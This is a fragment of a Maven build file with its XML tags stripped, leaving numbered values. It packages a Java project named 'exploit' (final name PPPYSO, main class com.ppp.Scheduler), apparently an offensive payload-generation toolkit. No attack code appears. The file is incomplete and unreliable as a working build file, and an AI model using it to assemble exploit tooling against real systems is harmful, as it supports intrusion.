15 | 1.6 16 | 1.6 17 | 18 | 19 | 20 | 21 | com.ppp 22 | exploit 23 | 1.0 24 | 25 | 26 | 27 | commons-cli 28 | commons-cli 29 | 1.5.0 30 | 31 | 32 | 33 | 34 | PPPYSO 35 | 36 | 37 | org.apache.maven.plugins 38 | maven-compiler-plugin 39 | 3.8.1 40 | 41 | ${jdk.source.version} 42 | ${jdk.source.version} 43 | 44 | 45 | 46 | 47 | org.apache.maven.plugins 48 | maven-jar-plugin 49 | 3.3.0 50 | 51 | 52 | 53 | true 54 | com.ppp.Scheduler 55 | 56 | 57 | 58 | 59 | 60 | 61 | org.apache.maven.plugins 62 | maven-assembly-plugin 63 | 3.3.0 64 | 65 | 66 | jar-with-dependencies 67 | 68 | 69 | 70 | com.ppp.Scheduler 71 | 72 | 73 | ${project.build.finalName}-${version} 74 | 75 | 76 | 77 | make-assembly 78 | package 79 | 80 | single 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | --------------------------------------------------------------------------------